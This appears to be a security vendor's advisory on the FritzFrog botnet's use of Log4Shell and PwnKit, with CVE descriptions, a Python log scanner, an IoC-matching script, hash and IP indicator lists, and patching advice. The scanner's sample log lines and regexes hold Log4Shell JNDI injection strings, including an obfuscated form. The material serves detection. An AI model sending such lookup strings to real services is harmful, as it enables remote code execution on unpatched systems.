OVERVIEW

The FritzFrog botnet, known for its persistent and sophisticated attacks, has returned with a new arsenal, leveraging the Log4Shell vulnerability (CVE-2021-44228) alongside PwnKit (CVE-2021-4034) to infiltrate networks.  

  • CVE-2021-44228 (CVSS 10) is a critical vulnerability, exploited in the wild as a zero-day, that was found in the Apache Log4j2 Java-based logging library in December 2021. It is an unauthenticated remote code execution (RCE) flaw that allows complete system takeover and affects Log4j2 versions 2.0-beta9 up to 2.16.1.
  • CVE-2021-4034 (CVSS 7.8), known as PwnKit, is a vulnerability in the Polkit Linux component that is exploited through the pkexec binary. pkexec runs with root privileges even when invoked by a user with limited permissions, which is what lets FritzFrog load and execute its binary payload as root.

Recently, we learned that Log4Shell is being exploited in a brute-force manner, targeting vulnerable Java applications within compromised networks. This marks a significant shift in FritzFrog's tactics, as it now focuses on internal hosts rather than solely targeting externally accessible assets. By exploiting Log4Shell, FritzFrog can potentially breach systems that were overlooked during initial vulnerability patching efforts. FritzFrog's use of the PwnKit flaw then gives it local privilege escalation, strengthening its persistence and allowing deeper infiltration into compromised networks.
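The brute-force Log4Shell activity described above is visible in the access logs of internal Java services: every attempt carries a JNDI lookup string in a logged field, often wrapped in nested lookups to hide the word "jndi". The following detector is an added example written for this notice, not code from Avertium or from any FritzFrog analysis. The log lines, the internal source address 10.0.5.21 and the callback hosts are all constructed; the normalization step mirrors how Log4j itself resolves lower/upper and default-value lookups, so the obfuscated form collapses to the same token as the plain one.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample access-log lines (not from the advisory). The first is
# benign traffic; the second and third carry a JNDI lookup in the User-Agent,
# the third one obfuscated with nested case-conversion lookups.
SAMPLE_LOGS = [
    '10.0.5.21 - - [01/Feb/2024:10:12:01 +0000] "GET /api/health HTTP/1.1" 200 "-" "curl/7.81.0"',
    '10.0.5.21 - - [01/Feb/2024:10:12:02 +0000] "GET /api/login HTTP/1.1" 500 "-" "${jndi:ldap://10.0.5.21:1389/a}"',
    '10.0.5.21 - - [01/Feb/2024:10:12:03 +0000] "GET /api/user HTTP/1.1" 500 "-" "${${lower:j}${upper:n}di:rmi://10.0.5.21:1099/b}"',
]

# Innermost case-conversion lookups, e.g. ${lower:J} -> j, ${upper:n} -> N.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Default-value lookups on an undefined variable, e.g. ${::-j} or
# ${env:NOPE:-j}, which Log4j resolves to the text after ":-".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# A resolved JNDI lookup: the scheme and the host the victim would contact.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)
# Source address at the start of a combined-format log line.
_SOURCE_IP = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested Log4j lookups so an obfuscated 'jndi' token becomes visible."""
    for _ in range(max_rounds):
        before = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def inspect_line(line: str) -> Optional[Dict[str, str]]:
    """Return details of a JNDI lookup attempt found in a log line, or None if clean."""
    m = _JNDI.search(normalize_lookups(line))
    if not m:
        return None
    src = _SOURCE_IP.match(line)
    return {
        "source": src.group(1) if src else "unknown",
        "scheme": m.group(1).lower(),
        "host": m.group(2),
        "raw": line,
    }


def scan_log_lines(lines: List[str]) -> List[Dict[str, str]]:
    """Run inspect_line over a batch of log lines and keep only the hits."""
    return [hit for hit in (inspect_line(line) for line in lines) if hit]


def attempts_by_source(hits: List[Dict[str, str]]) -> Counter:
    """Count attempts per source IP. Many attempts from one internal host
    against one service is the brute-force pattern described in the notice."""
    return Counter(h["source"] for h in hits)


if __name__ == "__main__":
    found = scan_log_lines(SAMPLE_LOGS)
    for h in found:
        print(f"{h['source']} attempted {h['scheme']}://{h['host']}")
    print(dict(attempts_by_source(found)))
```

Run it over the access logs of every internal Java application, not only those exposed to the internet; a source address that appears repeatedly in the per-source counter is a host that is likely already compromised and worth isolating.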

Originally identified in January 2020, FritzFrog has evolved, expanding its targets beyond internet-facing servers with weak SSH credentials to include various sectors such as healthcare, education, and government. Also, the botnet has enhanced its SSH brute-forcing capabilities to identify specific targets and evade traditional security measures. 

If organizations have not already done so, Avertium strongly recommends patching the Log4Shell and PwnKit vulnerabilities across all endpoints, including internal systems. 

AVERTIUM'S RECOMMENDATIONS

  • As previously stated, Avertium recommends patching the Log4Shell vulnerability as soon as possible. 
  • Because all Polkit versions released since 2009 are vulnerable to PwnKit, Avertium recommends patching that vulnerability as soon as possible as well.

INDICATORS OF COMPROMISE (IoCs)

File Hashes (SHA-256 unless noted)

  • 103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046 
  • 39ab194dc7a7ba65615a30d99ed8845ee00ad19f2ac1236fbd71a671f7fa4c5a 
  • 3205603282a636979a55aa1e1be518cd3adcbbe491745d996ceb4b5a4dece0c5 
  • 85cb8ceda7d2a29bc7c6c96dd279c43559797a624fc15d44da53ca02379afe01 
  • 6fe6808b9cfe654f526108ec61cb5211bb6601d28e192cadf06102073b54f69c 
  • 30c150419000d27dafcd5d00702411b2b23b0f5d7e4d0cc729a7d63b2e460a01 
  • f77ab04ee56f3cd4845d4a80c5817a7de4f0561d976d87563deab752363a765d 
  • 9384b9e39334479194aacb53cb25ace289b6afe2e41bdc8619b2d2cae966b948 
  • f718d6d12006b59b6d8f173e8cf31d3b (MD5)
  • 0ab8836efcaa62c7daac314e0b7ab1679319b2901578fd9e95ec3476b4c1a732 
  • 23e390e6531623c1e9e09b1eaf807d501d1a01e45184b7d3ffc4eeed955b0c6d 
  • 7f18e5b5b7645a80a0d44adf3fecdafcbf937bfe30a4cfb965a1421e034996dd 
  • 7745b070943e910e8807e3521ac7b7a01401d131bf6c18a63433f8177ed539a6 
  • 453468b86856665f2cc0e0e71668c0b6aac8b14326c623995ba5963f22257619 
  • 001eb377f0452060012124cb214f658754c7488ccb82e23ec56b2f45a636c859 
  • 8c094313b1d4236ae3f630d93e8037b0a9d38df716d5d7aed5b871dea0dc1445 
  • 041bc20ca8ac3161098cbc976e67e3c0f1b672ad36ecbe22fd21cbd53bcaa742 
  • 2378e76aba1ad6e0c937fb39989217bf0de616fdad4726c0f4233bf5414cde86 
  • d1e82d4a37959a9e6b661e31b8c8c6d2813c93ac92508a2771b2491b04ea2485 
  • 52b11d3fa9206f51c601bd85cb480102fd938894b7274fac3d20915eb3af44f8 
  • 985ffee662969825146d1b465d068ea4f5f01990d13827511415fd497cf9db86 
  • 705b6c079f6198e4be813d2b1967bf5482bc20fe (SHA-1)
  • 0b95071c657f23d4d8bfa39042ed8ad0a1c1bceb6b265c1237c12c4c0818c248 
  • 90b61cc77bb2d726219fd00ae2d0ecdf6f0fe7078529e87b7ec8e603008232d5 
  • 5fb29fb0136978b9ccf60750af09cec74a257a0ca9c47159ca74dbba21fbcc59 
  • fb3371dd45585763f1436afb7d64c202864d89ee6cbb743efac9dbf1cefcc291 
  • d9e8d9187fdd5a6682cc3b55076fe48bc8743487eb4731f669a7d591d3015ce5 
IP Addresses

  • 1.192.94.61
  • 100.0.197.18
  • 100.4.215.106
  • 102.131.59.246
  • 102.135.176.181
  • 103.127.80.9

Please note that Avertium has discovered additional IP addresses beyond those listed here, which we are monitoring.
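The hash list above mixes three digest lengths, so a matcher has to sort indicators by algorithm before comparing them against endpoint or network telemetry. The script below is an added example written for this notice, not Avertium tooling: it parses indicators straight out of the advisory text (a subset of the values above is embedded; paste the full lists for real use), classifies each hash by length, and checks constructed process and flow events. The event records, host names and the "/tmp/<placeholder>" path are constructed; only the hashes and IP addresses come from this page.

```python
import hashlib
import re
from typing import Dict, List, Set

# Indicators copied from the advisory above (subset). Paste the complete
# "File Hashes" and "IP Addresses" lists here for production use.
ADVISORY_IOCS = """
File Hashes
  • 103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046
  • f718d6d12006b59b6d8f173e8cf31d3b
  • 705b6c079f6198e4be813d2b1967bf5482bc20fe
  • 0b95071c657f23d4d8bfa39042ed8ad0a1c1bceb6b265c1237c12c4c0818c248
IP Addresses
  • 1.192.94.61
  • 103.127.80.9
"""

# Constructed telemetry (not real events): EDR-style process records with a
# file digest, and flow records with a destination address. One MD5 is
# upper-cased on purpose to show that matching is case-insensitive.
SAMPLE_EVENTS = [
    {"type": "process", "host": "app-01", "path": "/usr/bin/java",
     "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},
    {"type": "process", "host": "app-02", "path": "/tmp/<placeholder>",
     "sha256": "0b95071c657f23d4d8bfa39042ed8ad0a1c1bceb6b265c1237c12c4c0818c248"},
    {"type": "process", "host": "app-03", "path": "/tmp/<placeholder>",
     "md5": "F718D6D12006B59B6D8F173E8CF31D3B"},
    {"type": "netflow", "host": "app-02", "dst_ip": "103.127.80.9"},
    {"type": "netflow", "host": "app-01", "dst_ip": "10.0.0.5"},
]

_HEX = re.compile(r"^[0-9a-f]+$")
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Hex digest length identifies the algorithm the advisory used for that entry.
_HASH_ALGOS = {32: "md5", 40: "sha1", 64: "sha256"}
_ALGOS = ("md5", "sha1", "sha256")


def parse_iocs(text: str) -> Dict[str, Set[str]]:
    """Pull hashes and IPv4 addresses out of advisory text, keyed by indicator type."""
    iocs: Dict[str, Set[str]] = {"md5": set(), "sha1": set(), "sha256": set(), "ip": set()}
    for raw in text.splitlines():
        # Strip the bullet and any trailing annotation such as "(MD5)".
        token = raw.strip().lstrip("•").strip().split(" ")[0].lower()
        if not token:
            continue
        if _IPV4.match(token):
            iocs["ip"].add(token)
        elif _HEX.match(token) and len(token) in _HASH_ALGOS:
            iocs[_HASH_ALGOS[len(token)]].add(token)
    return iocs


def match_events(events: List[dict], iocs: Dict[str, Set[str]]) -> List[Dict[str, str]]:
    """Return one hit per event field that equals a listed indicator."""
    hits: List[Dict[str, str]] = []
    for ev in events:
        for algo in _ALGOS:
            digest = ev.get(algo, "").lower()
            if digest and digest in iocs[algo]:
                hits.append({"host": ev["host"], "kind": algo, "indicator": digest})
        dst = ev.get("dst_ip")
        if dst and dst in iocs["ip"]:
            hits.append({"host": ev["host"], "kind": "ip", "indicator": dst})
    return hits


def check_file_bytes(data: bytes, iocs: Dict[str, Set[str]]) -> List[str]:
    """Hash file contents with every algorithm the advisory uses; return the
    algorithms whose digest is listed (empty list means no match)."""
    return [a for a in _ALGOS if hashlib.new(a, data).hexdigest() in iocs[a]]


if __name__ == "__main__":
    parsed = parse_iocs(ADVISORY_IOCS)
    for hit in match_events(SAMPLE_EVENTS, parsed):
        print(f"{hit['host']}: {hit['kind']} indicator {hit['indicator']}")
    print("benign sample matches:", check_file_bytes(b"constructed benign content", parsed))
```

Because hash matching only catches the exact samples listed, treat it as confirmation of a suspected host rather than as the primary detection; the Log4Shell log signatures and the outbound connections to the listed addresses are the earlier signals.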

HOW AVERTIUM IS PROTECTING OUR CUSTOMERS

Avertium aligns your Cybersecurity Strategy with your business strategy, ensuring that your investment in security is also an investment in your business. Our Cybersecurity Strategy service includes:  
  • Strategic Security Assessments - Strengthening your security posture begins with knowing where your current program stands (NIST CSF, Security Architecture, Business Impact Analysis, Sensitive Data Inventory, Network Virtualization and Cloud Assessment).
  • Threat Mapping - Leverage Avertium's Cyber Threat Intelligence to get a more informed view of your most likely attack scenarios (Threat Assessment and MITRE ATT&CK).
  • Cyber Maturity Roadmap - Embrace a comprehensive, quantifiable, and well-organized approach to establishing and continuously enhancing your cybersecurity resilience (Policy + Procedure Development, Virtual CISO (vCISO), Training + Enablement, Tabletop Exercises, and Business Continuity + Disaster Recovery Plan).

SUPPORTING DOCUMENTATION

Apache Log4j Core: CVE-2021-44832: Apache Log4j2 Remote Code Execution (rapid7.com) 

Sophisticated FritzFrog P2P Botnet Returns After Long Break - SecurityWeek 

FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities - Help Net Security 

LIVEcommunity - Ubuntu Patch for CVE-2021-4034 - LIVEcommunity - 461834 (paloaltonetworks.com) 

FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network (thehackernews.com) 

USN-5252-2: PolicyKit vulnerability | Ubuntu security notices | Ubuntu 

CVE-2021-4034 | Ubuntu 

USN-5252-1: PolicyKit vulnerability | Ubuntu security notices | Ubuntu 